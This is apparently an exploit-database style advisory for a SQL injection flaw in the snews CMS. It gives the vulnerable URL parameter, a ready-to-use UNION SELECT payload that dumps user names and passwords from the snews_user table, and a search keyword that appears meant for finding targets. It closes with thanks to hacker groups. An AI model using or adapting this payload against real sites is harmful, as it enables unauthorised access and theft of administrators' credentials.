Title: CMS snews SQL Injection Vulnerability
Author: By onestree
Download: http://snewscms.com/
Tested on: ubuntu 12.10 / win 7
Keyword: inurl:"tanyakan pada rumput yang bergoyang"

*************************************************************

SQL poc:

http://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]

Example:

http://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*

Thanks:
Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell

indonesiancoder - moeslimh4x0r - go-coder
spesial my hunny :*